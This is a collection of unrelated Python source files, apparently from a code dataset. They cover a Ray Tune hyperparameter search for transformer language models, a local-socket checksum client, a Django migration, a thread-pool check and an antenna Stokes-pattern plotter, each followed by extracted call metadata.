LineByLineTextDatasetLabels(tokenizer=tokenizer, file_path=file_path, block_size=args.block_size) else: return TextDataset( tokenizer=tokenizer, file_path=file_path, block_size=args.block_size, overwrite_cache=args.overwrite_cache, cache_dir=cache_dir, ) class TuneTransformerTrainer(Trainer): def create_optimizer_and_scheduler(self, num_training_steps: int): if self.optimizer is None: no_decay = ["bias", "LayerNorm.weight"] optimizer_grouped_parameters = [ { "params": [p for n, p in self.model.named_parameters() if not any(nd in n for nd in no_decay)], "weight_decay": self.args.weight_decay, }, { "params": [p for n, p in self.model.named_parameters() if any(nd in n for nd in no_decay)], "weight_decay": 0.0, }, ] self.optimizer = AdamW( optimizer_grouped_parameters, lr=self.args.learning_rate, betas=(self.args.adam_beta1, self.args.adam_beta2), eps=self.args.adam_epsilon, ) if self.lr_scheduler is None: self.lr_scheduler = get_linear_schedule_with_warmup( self.optimizer, num_warmup_steps=self.args.warmup_steps, num_training_steps=num_training_steps ) return self.current_optimizer, self.current_scheduler def evaluate(self, eval_dataset= None): eval_dataloader = self.get_eval_dataloader(eval_dataset) output = self.prediction_loop( eval_dataloader, description="Evaluation") self.log(output.metrics) self.save_state() tune.report(**output.metrics) return output.metrics def save_state(self): with tune.checkpoint_dir(step=self.global_step) as checkpoint_dir: self.args.output_dir = checkpoint_dir # This is the directory name that Huggingface requires. output_dir = os.path.join( self.args.output_dir, f"{PREFIX_CHECKPOINT_DIR}-{self.global_step}") self.save_model(output_dir) self.current_optimizer, self.current_scheduler = self.create_optimizer_and_scheduler(360) if self.is_world_master(): torch.save(self.current_optimizer.state_dict(), os.path.join(output_dir, "optimizer.pt")) torch.save(self.current_scheduler.state_dict(), os.path.join(output_dir, "scheduler.pt")) def recover_checkpoint(tune_checkpoint_dir, model_name=None): if tune_checkpoint_dir is None or len(tune_checkpoint_dir) == 0: return model_name # Get subdirectory used for Huggingface. subdirs = [ os.path.join(tune_checkpoint_dir, name) for name in os.listdir(tune_checkpoint_dir) if os.path.isdir(os.path.join(tune_checkpoint_dir, name)) ] # There should only be 1 subdir. assert len(subdirs) == 1, subdirs return subdirs[0] # def train_transformer(config, checkpoint_dir=None): # train_dataset, eval_dataset = get_datasets(config) # # training_args = TrainingArguments( # output_dir=tune.get_trial_dir(), # learning_rate=config["learning_rate"], # do_train=True, # do_eval=True, # evaluate_during_training=True, # # Run eval after every epoch. # eval_steps=(len(train_dataset) // config["per_gpu_train_batch_size"]) + # 1, # # We explicitly set save to 0, and do checkpointing in evaluate instead # save_steps=0, # num_train_epochs=config["num_epochs"], # max_steps=config["max_steps"], # per_device_train_batch_size=config["per_gpu_train_batch_size"], # per_device_eval_batch_size=config["per_gpu_val_batch_size"], # warmup_steps=0, # weight_decay=config["weight_decay"], # logging_dir="./logs", # ) # # model_name_or_path = recover_checkpoint(checkpoint_dir, config["model_name"]) # # num_labels = glue_tasks_num_labels[config["task_name"]] # # config = AutoConfig.from_pretrained( # model_name_or_path, # num_labels=num_labels, # finetuning_task=task_name, # ) # model = AutoModelForSequenceClassification.from_pretrained( # model_name_or_path, # config=config, # ) # # # Use our modified TuneTransformerTrainer # tune_trainer = TuneTransformerTrainer( # model=model, # args=training_args, # train_dataset=train_dataset, # eval_dataset=eval_dataset, # compute_metrics=utils.build_compute_metrics_fn(task_name), # ) # tune_trainer.train(model_name_or_path) def train_transformer(config, checkpoint_dir=None): # See all possible arguments in src/transformers/training_args.py # or by passing the --help flag to this script. # We now keep distinct sets of args, for a cleaner separation of concerns. # parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments)) # model_args, data_args, training_args = parser.parse_args_into_dataclasses() if data_args.eval_data_file is None and training_args.do_eval: raise ValueError( "Cannot do evaluation without an evaluation data file. Either supply a file to --eval_data_file " "or remove the --do_eval argument." ) if ( os.path.exists(training_args.output_dir) and os.listdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir ): raise ValueError( f"Output directory ({training_args.output_dir}) already exists and is not empty. Use --overwrite_output_dir to overcome." ) # Setup logging logging.basicConfig( format="%(asctime)s - %(levelname)s - %(name)s - %(message)s", datefmt="%m/%d/%Y %H:%M:%S", level=logging.INFO if training_args.local_rank in [-1, 0] else logging.WARN, ) logger.warning( "Process rank: %s, device: %s, n_gpu: %s, distributed training: %s, 16-bits training: %s", training_args.local_rank, training_args.device, training_args.n_gpu, bool(training_args.local_rank != -1), training_args.fp16, ) logger.info("Training/evaluation parameters %s", training_args) # Set seed set_seed(training_args.seed) # Load pretrained model and tokenizer # # Distributed training: # The .from_pretrained methods guarantee that only one local process can concurrently # download model & vocab. if model_args.config_name: config_in = AutoConfig.from_pretrained(model_args.config_name, cache_dir=model_args.cache_dir) elif model_args.model_name_or_path: config_in = AutoConfig.from_pretrained(model_args.model_name_or_path, cache_dir=model_args.cache_dir) else: config_in = CONFIG_MAPPING[model_args.model_type]() logger.warning("You are instantiating a new config instance from scratch.") if model_args.tokenizer_name: tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name, cache_dir=model_args.cache_dir) elif model_args.model_name_or_path: tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path, cache_dir=model_args.cache_dir) else: raise ValueError( "You are instantiating a new tokenizer from scratch. This is not supported, but you can do it from another script, save it," "and load it from here, using --tokenizer_name" ) if tokenizer.pad_token_id is None: if model_args.force_pad_token: # See PR 3388. Some tokenizers don't had pad tokens which causes errors at the encoding step in the collate_fn. # We give here the option to force the addition of a pad token. The attention mask is used to ignore this token # when feeding to the model.x tokenizer.add_special_tokens({"pad_token": "<pad>"}) else: logger.warning( "Attempting to train a model whose tokenizer has no padding token. This may result in errors in the encoding step. Set the --force_pad_token flag to fix this." ) model_name_or_path = recover_checkpoint(checkpoint_dir, config["model_name"]) if model_args.model_name_or_path: model = AutoModelWithLMHead.from_pretrained( model_args.model_name_or_path, from_tf=bool(".ckpt" in model_args.model_name_or_path), config=config_in, cache_dir=model_args.cache_dir, ) else: logger.info("Training new model from scratch") model = AutoModelWithLMHead.from_config(config_in) special_tokens_dict = {'bos_token': '<bos>', 'eos_token': '<eos>', 'pad_token': '<pad>'} num_added_toks = tokenizer.add_special_tokens(special_tokens_dict) model.resize_token_embeddings(len(tokenizer)) if config_in.model_type in ["bert", "roberta", "distilbert", "camembert"] and not data_args.mlm: raise ValueError( "BERT and RoBERTa-like models do not have LM heads but masked LM heads. They must be run using the" "--mlm flag (masked language modeling)." ) if data_args.block_size <= 0: data_args.block_size = tokenizer.max_len # Our input block size will be the max possible for the model else: data_args.block_size = min(data_args.block_size, tokenizer.max_len) # Get datasets train_dataset = ( get_dataset(data_args, tokenizer=tokenizer, cache_dir=model_args.cache_dir) if training_args.do_train else None ) # print('train_dataset {}'.format(train_dataset.examples[0])) eval_dataset = ( get_dataset(data_args, tokenizer=tokenizer, evaluate=True, cache_dir=model_args.cache_dir) if training_args.do_eval else None ) if config_in.model_type == "xlnet": data_collator = DataCollatorForPermutationLanguageModeling( tokenizer=tokenizer, plm_probability=data_args.plm_probability, max_span_length=data_args.max_span_length, ) else: data_collator = DataCollatorForLanguageModeling( tokenizer=tokenizer, mlm=data_args.mlm, mlm_probability=data_args.mlm_probability ) training_args = TrainingArguments( output_dir=tune.get_trial_dir(), learning_rate=config["learning_rate"], do_train=True, do_eval=True, evaluate_during_training=True, # Run eval after every epoch. eval_steps=(len(train_dataset) // config["per_gpu_train_batch_size"]) + 1, # We explicitly set save to 0, and do checkpointing in evaluate instead save_steps=0, num_train_epochs=config["num_epochs"], max_steps=config["max_steps"], per_device_train_batch_size=config["per_gpu_train_batch_size"], per_device_eval_batch_size=config["per_gpu_val_batch_size"], warmup_steps=0, weight_decay=config["weight_decay"], logging_dir="./logs") # Initialize our Trainer tune_trainer = TuneTransformerTrainer( model=model, args=training_args, data_collator=data_collator, train_dataset=train_dataset, eval_dataset=eval_dataset, prediction_loss_only=True, # compute_metrics=compute_metrics, ) if training_args.do_train: model_path = ( model_args.model_name_or_path if model_args.model_name_or_path is not None and os.path.isdir(model_args.model_name_or_path) else None ) tune_trainer.train(model_path=model_path) if __name__ == "__main__": parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments)) model_args, data_args, training_args = parser.parse_args_into_dataclasses() config = { # These 3 configs below were defined earlier "model_name": model_args.model_name_or_path, "task_name": "CLM", "data_dir": "", "per_gpu_val_batch_size": 32, "per_gpu_train_batch_size": tune.choice([16, 32, 64]), "learning_rate": tune.uniform(1e-5, 5e-5), "weight_decay": tune.uniform(0.0, 0.3), "num_epochs": tune.choice([2, 3, 4, 5]), "max_steps": -1, # We use num_epochs instead. "wandb": { "project": "pbt_transformers", "reinit": True, "allow_val_change": True } } logger.info(config) scheduler = PopulationBasedTraining( time_attr="training_iteration", metric="eval_loss", mode="min", perturbation_interval=2, hyperparam_mutations={ "weight_decay": lambda: tune.uniform(0.0, 0.3).func(None), "learning_rate": lambda: tune.uniform(1e-5, 5e-5).func(None), "per_gpu_train_batch_size": [16, 32, 64], }) reporter = CLIReporter( parameter_columns={ "weight_decay": "w_decay", "learning_rate": "lr", "per_gpu_train_batch_size": "train_bs/gpu", "num_epochs": "num_epochs" }, metric_columns=[ "eval_acc", "eval_loss", "epoch", "training_iteration" ]) analysis = tune.run( train_transformer, resources_per_trial={ "cpu": 1, "gpu": 1 }, config=config, num_samples=3, scheduler=scheduler, keep_checkpoints_num=3, checkpoint_score_attr="training_iteration", progress_reporter=reporter, local_dir="./ray_results/", name="tune_trans") best_config = analysis.get_best_config(metric="eval_loss", mode="min") print(best_config)
[((57, 0, 57, 14), 'ray.shutdown', 'ray.shutdown', ({}, {}), '()', False, 'import ray\n'), ((58, 0, 58, 54), 'ray.init', 'ray.init', (), '', False, 'import ray\n'), ((60, 9, 60, 36), 'logging.getLogger', 'logging.getLogger', ({(60, 27, 60, 35): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((63, 28, 63, 61), 'transformers.MODEL_WITH_LM_HEAD_MAPPING.keys', 'MODEL_WITH_LM_HEAD_MAPPING.keys', ({}, {}), '()', False, 'from transformers import CONFIG_MAPPING, MODEL_WITH_LM_HEAD_MAPPING, AutoConfig, AutoModelWithLMHead, AutoTokenizer, DataCollatorForLanguageModeling, DataCollatorForPermutationLanguageModeling, HfArgumentParser, LineByLineTextDataset, PreTrainedTokenizer, TextDataset, Trainer, TrainingArguments, set_seed\n'), ((73, 40, 78, 5), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((83, 33, 85, 5), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((86, 36, 88, 5), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((89, 31, 91, 5), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((92, 28, 97, 5), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((98, 36, 100, 5), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((109, 37, 111, 5), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((112, 36, 115, 5), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((116, 25, 119, 5), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((121, 16, 123, 5), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((124, 29, 126, 5), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((127, 29, 132, 5), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((133, 27, 135, 5), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((137, 22, 144, 5), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((145, 28, 147, 5), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((312, 4, 316, 5), 'logging.basicConfig', 'logging.basicConfig', (), '', False, 'import logging\n'), ((328, 4, 328, 32), 'transformers.set_seed', 'set_seed', ({(328, 13, 328, 31): 'training_args.seed'}, {}), '(training_args.seed)', False, 'from transformers import CONFIG_MAPPING, MODEL_WITH_LM_HEAD_MAPPING, AutoConfig, AutoModelWithLMHead, AutoTokenizer, DataCollatorForLanguageModeling, DataCollatorForPermutationLanguageModeling, HfArgumentParser, LineByLineTextDataset, PreTrainedTokenizer, TextDataset, Trainer, TrainingArguments, set_seed\n'), ((457, 13, 457, 89), 'transformers.HfArgumentParser', 'HfArgumentParser', ({(457, 30, 457, 88): '(ModelArguments, DataTrainingArguments, TrainingArguments)'}, {}), '((ModelArguments, DataTrainingArguments, TrainingArguments))', False, 'from transformers import CONFIG_MAPPING, MODEL_WITH_LM_HEAD_MAPPING, AutoConfig, AutoModelWithLMHead, AutoTokenizer, DataCollatorForLanguageModeling, DataCollatorForPermutationLanguageModeling, HfArgumentParser, LineByLineTextDataset, PreTrainedTokenizer, TextDataset, Trainer, TrainingArguments, set_seed\n'), ((490, 15, 499, 12), 'ray.tune.CLIReporter', 'CLIReporter', (), '', False, 'from ray.tune import CLIReporter\n'), ((501, 15, 514, 28), 'ray.tune.run', 'tune.run', (), '', False, 'from ray import tune\n'), ((158, 15, 158, 106), 'transformers.LineByLineTextDataset', 'LineByLineTextDataset', (), '', False, 'from transformers import CONFIG_MAPPING, MODEL_WITH_LM_HEAD_MAPPING, AutoConfig, AutoModelWithLMHead, AutoTokenizer, DataCollatorForLanguageModeling, DataCollatorForPermutationLanguageModeling, HfArgumentParser, LineByLineTextDataset, PreTrainedTokenizer, TextDataset, Trainer, TrainingArguments, set_seed\n'), ((161, 15, 167, 9), 'transformers.TextDataset', 'TextDataset', (), '', False, 'from transformers import CONFIG_MAPPING, MODEL_WITH_LM_HEAD_MAPPING, AutoConfig, AutoModelWithLMHead, AutoTokenizer, DataCollatorForLanguageModeling, DataCollatorForPermutationLanguageModeling, HfArgumentParser, LineByLineTextDataset, PreTrainedTokenizer, TextDataset, Trainer, TrainingArguments, set_seed\n'), ((206, 8, 206, 37), 'ray.tune.report', 'tune.report', ({}, {}), '(**output.metrics)', False, 'from ray import tune\n'), ((231, 8, 231, 47), 'os.path.join', 'os.path.join', ({(231, 21, 231, 40): 'tune_checkpoint_dir', (231, 42, 231, 46): 'name'}, {}), '(tune_checkpoint_dir, name)', False, 'import os\n'), ((302, 8, 302, 48), 'os.path.exists', 'os.path.exists', ({(302, 23, 302, 47): 'training_args.output_dir'}, {}), '(training_args.output_dir)', False, 'import os\n'), ((303, 12, 303, 48), 'os.listdir', 'os.listdir', ({(303, 23, 303, 47): 'training_args.output_dir'}, {}), '(training_args.output_dir)', False, 'import os\n'), ((337, 20, 337, 102), 'transformers.AutoConfig.from_pretrained', 'AutoConfig.from_pretrained', (), '', False, 'from transformers import CONFIG_MAPPING, MODEL_WITH_LM_HEAD_MAPPING, AutoConfig, AutoModelWithLMHead, AutoTokenizer, DataCollatorForLanguageModeling, DataCollatorForPermutationLanguageModeling, HfArgumentParser, LineByLineTextDataset, PreTrainedTokenizer, TextDataset, Trainer, TrainingArguments, set_seed\n'), ((345, 20, 345, 108), 'transformers.AutoTokenizer.from_pretrained', 'AutoTokenizer.from_pretrained', (), '', False, 'from transformers import CONFIG_MAPPING, MODEL_WITH_LM_HEAD_MAPPING, AutoConfig, AutoModelWithLMHead, AutoTokenizer, DataCollatorForLanguageModeling, DataCollatorForPermutationLanguageModeling, HfArgumentParser, LineByLineTextDataset, PreTrainedTokenizer, TextDataset, Trainer, TrainingArguments, set_seed\n'), ((375, 16, 375, 58), 'transformers.AutoModelWithLMHead.from_config', 'AutoModelWithLMHead.from_config', ({(375, 48, 375, 57): 'config_in'}, {}), '(config_in)', False, 'from transformers import CONFIG_MAPPING, MODEL_WITH_LM_HEAD_MAPPING, AutoConfig, AutoModelWithLMHead, AutoTokenizer, DataCollatorForLanguageModeling, DataCollatorForPermutationLanguageModeling, HfArgumentParser, LineByLineTextDataset, PreTrainedTokenizer, TextDataset, Trainer, TrainingArguments, set_seed\n'), ((407, 24, 411, 9), 'transformers.DataCollatorForPermutationLanguageModeling', 'DataCollatorForPermutationLanguageModeling', (), '', False, 'from transformers import CONFIG_MAPPING, MODEL_WITH_LM_HEAD_MAPPING, AutoConfig, AutoModelWithLMHead, AutoTokenizer, DataCollatorForLanguageModeling, DataCollatorForPermutationLanguageModeling, HfArgumentParser, LineByLineTextDataset, PreTrainedTokenizer, TextDataset, Trainer, TrainingArguments, set_seed\n'), ((413, 24, 415, 9), 'transformers.DataCollatorForLanguageModeling', 'DataCollatorForLanguageModeling', (), '', False, 'from transformers import CONFIG_MAPPING, MODEL_WITH_LM_HEAD_MAPPING, AutoConfig, AutoModelWithLMHead, AutoTokenizer, DataCollatorForLanguageModeling, DataCollatorForPermutationLanguageModeling, HfArgumentParser, LineByLineTextDataset, PreTrainedTokenizer, TextDataset, Trainer, TrainingArguments, set_seed\n'), ((466, 34, 466, 59), 'ray.tune.choice', 'tune.choice', ({(466, 46, 466, 58): '[16, 32, 64]'}, {}), '([16, 32, 64])', False, 'from ray import tune\n'), ((467, 23, 467, 47), 'ray.tune.uniform', 'tune.uniform', ({(467, 36, 467, 40): '(1e-05)', (467, 42, 467, 46): '(5e-05)'}, {}), '(1e-05, 5e-05)', False, 'from ray import tune\n'), ((468, 22, 468, 44), 'ray.tune.uniform', 'tune.uniform', ({(468, 35, 468, 38): '(0.0)', (468, 40, 468, 43): '(0.3)'}, {}), '(0.0, 0.3)', False, 'from ray import tune\n'), ((469, 20, 469, 45), 'ray.tune.choice', 'tune.choice', ({(469, 32, 469, 44): '[2, 3, 4, 5]'}, {}), '([2, 3, 4, 5])', False, 'from ray import tune\n'), ((185, 29, 190, 13), 'transformers.optimization.AdamW', 'AdamW', (), '', False, 'from transformers.optimization import AdamW, get_linear_schedule_with_warmup\n'), ((192, 32, 194, 13), 'transformers.optimization.get_linear_schedule_with_warmup', 'get_linear_schedule_with_warmup', (), '', False, 'from transformers.optimization import AdamW, get_linear_schedule_with_warmup\n'), ((211, 13, 211, 55), 'ray.tune.checkpoint_dir', 'tune.checkpoint_dir', (), '', False, 'from ray import tune\n'), ((214, 25, 216, 62), 'os.path.join', 'os.path.join', ({(215, 16, 215, 36): 'self.args.output_dir', (216, 16, 216, 61): 'f"""{PREFIX_CHECKPOINT_DIR}-{self.global_step}"""'}, {}), "(self.args.output_dir,\n f'{PREFIX_CHECKPOINT_DIR}-{self.global_step}')", False, 'import os\n'), ((232, 20, 232, 51), 'os.listdir', 'os.listdir', ({(232, 31, 232, 50): 'tune_checkpoint_dir'}, {}), '(tune_checkpoint_dir)', False, 'import os\n'), ((339, 20, 339, 109), 'transformers.AutoConfig.from_pretrained', 'AutoConfig.from_pretrained', (), '', False, 'from transformers import CONFIG_MAPPING, MODEL_WITH_LM_HEAD_MAPPING, AutoConfig, AutoModelWithLMHead, AutoTokenizer, DataCollatorForLanguageModeling, DataCollatorForPermutationLanguageModeling, HfArgumentParser, LineByLineTextDataset, PreTrainedTokenizer, TextDataset, Trainer, TrainingArguments, set_seed\n'), ((347, 20, 347, 112), 'transformers.AutoTokenizer.from_pretrained', 'AutoTokenizer.from_pretrained', (), '', False, 'from transformers import CONFIG_MAPPING, MODEL_WITH_LM_HEAD_MAPPING, AutoConfig, AutoModelWithLMHead, AutoTokenizer, DataCollatorForLanguageModeling, DataCollatorForPermutationLanguageModeling, HfArgumentParser, LineByLineTextDataset, PreTrainedTokenizer, TextDataset, Trainer, TrainingArguments, set_seed\n'), ((418, 19, 418, 39), 'ray.tune.get_trial_dir', 'tune.get_trial_dir', ({}, {}), '()', False, 'from ray import tune\n'), ((233, 25, 233, 64), 'os.path.join', 'os.path.join', ({(233, 38, 233, 57): 'tune_checkpoint_dir', (233, 59, 233, 63): 'name'}, {}), '(tune_checkpoint_dir, name)', False, 'import os\n'), ((449, 61, 449, 105), 'os.path.isdir', 'os.path.isdir', ({(449, 75, 449, 104): 'model_args.model_name_or_path'}, {}), '(model_args.model_name_or_path)', False, 'import os\n'), ((221, 27, 221, 67), 'os.path.join', 'os.path.join', ({(221, 40, 221, 50): 'output_dir', (221, 52, 221, 66): '"""optimizer.pt"""'}, {}), "(output_dir, 'optimizer.pt')", False, 'import os\n'), ((223, 27, 223, 67), 'os.path.join', 'os.path.join', ({(223, 40, 223, 50): 'output_dir', (223, 52, 223, 66): '"""scheduler.pt"""'}, {}), "(output_dir, 'scheduler.pt')", False, 'import os\n'), ((485, 38, 485, 60), 'ray.tune.uniform', 'tune.uniform', ({(485, 51, 485, 54): '0.0', (485, 56, 485, 59): '0.3'}, {}), '(0.0, 0.3)', False, 'from ray import tune\n'), ((486, 39, 486, 63), 'ray.tune.uniform', 'tune.uniform', ({(486, 52, 486, 56): '1e-05', (486, 58, 486, 62): '5e-05'}, {}), '(1e-05, 5e-05)', False, 'from ray import tune\n')]
pgp/RootHelperClientTestInteractions
checksums.py
6b9e9cc9f10eb2bf9b9dafa851ed56005f7666b5
from net_common import * import struct import sys def getDirHashOpts(withNames=False, ignoreThumbsFiles=True, ignoreUnixHiddenFiles=True, ignoreEmptyDirs=True): return bytearray([((1 if withNames else 0) + (2 if ignoreThumbsFiles else 0) + (4 if ignoreUnixHiddenFiles else 0) + (8 if ignoreEmptyDirs else 0))]) if __name__ == "__main__": sock = get_connected_local_socket() path = encodeString('/dev/shm/exampleDir') # path = encodeString('/dev/null') sock.sendall(bytearray(b'\x0A')) # HASH request # sock.sendall(bytearray(b'\x01')) # choose MD5 algorithm sock.sendall(bytearray(b'\x06')) # choose SHA3-224 algorithm sock.sendall(getDirHashOpts(withNames=True,ignoreUnixHiddenFiles=False)) # send dirHashOpts byte (unused for regular files) sock.sendall(struct.pack("@H", len(path))) # len of path as unsigned short sock.sendall(path) resp = sock.recv(1) # response first byte: \x00 OK or \xFF ERROR if resp != b'\x00': print("Error byte received, errno is:", struct.unpack("@i", sock.recv(4))[0]) sys.exit(0) # print(toHex(sock.recv(16))) # 128 bit (16 byte) md5 digest size print(toHex(sock.recv(28))) # 224 bit (28 byte) sha3-224 digest size sock.close()
[((30, 8, 30, 19), 'sys.exit', 'sys.exit', ({(30, 17, 30, 18): '(0)'}, {}), '(0)', False, 'import sys\n')]
uktrade/pir-api
investment_report/migrations/0020_auto_20180911_1005.py
79747ceab042c42c287e2b7471f6dade70f68693
# -*- coding: utf-8 -*- # Generated by Django 1.11.13 on 2018-09-11 10:05 from __future__ import unicode_literals import config.s3 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('investment_report', '0019_auto_20180820_1304'), ] operations = [ migrations.AddField( model_name='contact', name='website_href', field=models.URLField(default='https://invest.great.gov.uk/contact/', help_text='Custom link for website (used for tracking)', max_length=255), preserve_default=False, ) ]
[((19, 18, 19, 154), 'django.db.models.URLField', 'models.URLField', (), '', False, 'from django.db import migrations, models\n')]
whalesalad/filprofiler
tests/test-scripts/threadpools.py
9c12cbe62ad1fed5d59d923013739bb3377bc24c
"""Validate that number of threads in thread pools is set to 1.""" import numexpr import blosc import threadpoolctl # APIs that return previous number of threads: assert numexpr.set_num_threads(2) == 1 assert blosc.set_nthreads(2) == 1 for d in threadpoolctl.threadpool_info(): assert d["num_threads"] == 1, d
[((11, 9, 11, 40), 'threadpoolctl.threadpool_info', 'threadpoolctl.threadpool_info', ({}, {}), '()', False, 'import threadpoolctl\n'), ((8, 7, 8, 33), 'numexpr.set_num_threads', 'numexpr.set_num_threads', ({(8, 31, 8, 32): '(2)'}, {}), '(2)', False, 'import numexpr\n'), ((9, 7, 9, 28), 'blosc.set_nthreads', 'blosc.set_nthreads', ({(9, 26, 9, 27): '(2)'}, {}), '(2)', False, 'import blosc\n')]
David-McKenna/AntPat
scripts/viewStokespat.py
45618659994b27e2654f1effd6d9baa15867b6d3
#!/usr/bin/env python """A simple viewer for Stokes patterns based on two far-field pattern files. (Possibly based on one FF pattern files if it has two requests: one for each polarization channel.)""" import os import argparse import numpy import matplotlib.pyplot as plt from antpat.reps.sphgridfun.tvecfun import TVecFields from antpat.radfarfield import RadFarField from antpat.dualpolelem import DualPolElem FEKOsuffix = 'ffe' GRASPsuffix = 'swe' NECsuffix = 'out' def Jones2Stokes(Jones): """Convert Jones matrix to Stokes vector. This assumes dual-pol antenna receiving unpolarized unit valued radiation i.e. incoming Stokes = (1,0,0,0).""" brightmat = numpy.matmul(Jones, numpy.swapaxes(numpy.conjugate(Jones),-1,-2)) StokesI = numpy.real(brightmat[...,0,0]+brightmat[...,1,1]) StokesQ = numpy.real(brightmat[...,0,0]-brightmat[...,1,1]) StokesU = numpy.real(brightmat[...,0,1]+brightmat[...,1,0]) StokesV = numpy.imag(brightmat[...,0,1]-brightmat[...,1,0]) return StokesI, StokesQ, StokesU, StokesV def plotStokes_fromFEKOfiles(p_chan_file, q_chan_file, freq): (tvf_p, tvf_q) = (TVecFields(), TVecFields()) tvf_p.load_ffe(p_chan_file) tvf_q.load_ffe(q_chan_file) (ant_p, ant_q) = (RadFarField(tvf_p), RadFarField(tvf_q)) (p_chan_name, q_chan_name) = (os.path.basename(p_chan_file), os.path.basename(q_chan_file)) (ant_p.name, ant_q.name) = (p_chan_name, q_chan_name) dualpolAnt = DualPolElem(ant_p, ant_q) THETA, PHI, Jones = dualpolAnt.getJonesPat(freq) (StokesI, StokesQ, StokesU, StokesV) = Jones2Stokes(Jones) x = THETA*numpy.cos(PHI) y = THETA*numpy.sin(PHI) #x= THETA #y=PHI xyNames = ('theta*cos(phi)','theta*sin(phi)') fig = plt.figure() ax1 = fig.add_subplot(221) plt.pcolormesh(x, y, 10*numpy.log10(StokesI), label="I") #plt.pcolormesh(x, y, StokesI, label="I") plt.colorbar() ax1.set_title('I (dB)') ax2 = fig.add_subplot(222) plt.pcolormesh(x, y, StokesQ/StokesI, label="Q") plt.colorbar() ax2.set_title('Q/I') ax3 = fig.add_subplot(223) plt.pcolormesh(x, y, StokesU/StokesI, label="U") plt.colorbar() ax3.set_title('U/I') ax4 = fig.add_subplot(224) plt.pcolormesh(x, y, StokesV/StokesI, label="V") plt.colorbar() ax4.set_title('V/I') fig.suptitle('Stokes (azimuthal-equidistant proj) @ ' +str(freq/1e9)+' GHz') plt.show() if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("p_chan_file", help='Filename of polarization channel p') parser.add_argument("q_chan_file", help='Filename of polarization channel p') parser.add_argument("freq", nargs='?', type=float, help="Frequency in Hertz") args = parser.parse_args() if args.p_chan_file.endswith(FEKOsuffix): plotStokes_fromFEKOfiles(args.p_chan_file, args.q_chan_file, args.freq) elif args.p_chan_file.endswith(GRASPsuffix): print("Not implemented yet.") elif args.p_chan_file.endswith(NECsuffix): print("Not implemented yet.") else: print("Far-field pattern file type not known") exit(1)
[((22, 14, 22, 63), 'numpy.real', 'numpy.real', ({(22, 25, 22, 62): 'brightmat[..., 0, 0] + brightmat[..., 1, 1]'}, {}), '(brightmat[..., 0, 0] + brightmat[..., 1, 1])', False, 'import numpy\n'), ((23, 14, 23, 63), 'numpy.real', 'numpy.real', ({(23, 25, 23, 62): 'brightmat[..., 0, 0] - brightmat[..., 1, 1]'}, {}), '(brightmat[..., 0, 0] - brightmat[..., 1, 1])', False, 'import numpy\n'), ((24, 14, 24, 63), 'numpy.real', 'numpy.real', ({(24, 25, 24, 62): 'brightmat[..., 0, 1] + brightmat[..., 1, 0]'}, {}), '(brightmat[..., 0, 1] + brightmat[..., 1, 0])', False, 'import numpy\n'), ((25, 14, 25, 63), 'numpy.imag', 'numpy.imag', ({(25, 25, 25, 62): 'brightmat[..., 0, 1] - brightmat[..., 1, 0]'}, {}), '(brightmat[..., 0, 1] - brightmat[..., 1, 0])', False, 'import numpy\n'), ((36, 17, 36, 42), 'antpat.dualpolelem.DualPolElem', 'DualPolElem', ({(36, 29, 36, 34): 'ant_p', (36, 36, 36, 41): 'ant_q'}, {}), '(ant_p, ant_q)', False, 'from antpat.dualpolelem import DualPolElem\n'), ((45, 10, 45, 22), 'matplotlib.pyplot.figure', 'plt.figure', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((49, 4, 49, 18), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((53, 4, 53, 52), 'matplotlib.pyplot.pcolormesh', 'plt.pcolormesh', (), '', True, 'import matplotlib.pyplot as plt\n'), ((54, 4, 54, 18), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((58, 4, 58, 52), 'matplotlib.pyplot.pcolormesh', 'plt.pcolormesh', (), '', True, 'import matplotlib.pyplot as plt\n'), ((59, 4, 59, 18), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((63, 4, 63, 52), 'matplotlib.pyplot.pcolormesh', 'plt.pcolormesh', (), '', True, 'import matplotlib.pyplot as plt\n'), ((64, 4, 64, 18), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((67, 4, 67, 14), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((71, 13, 71, 38), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ({}, {}), '()', False, 'import argparse\n'), ((30, 22, 30, 34), 'antpat.reps.sphgridfun.tvecfun.TVecFields', 'TVecFields', ({}, {}), '()', False, 'from antpat.reps.sphgridfun.tvecfun import TVecFields\n'), ((30, 36, 30, 48), 'antpat.reps.sphgridfun.tvecfun.TVecFields', 'TVecFields', ({}, {}), 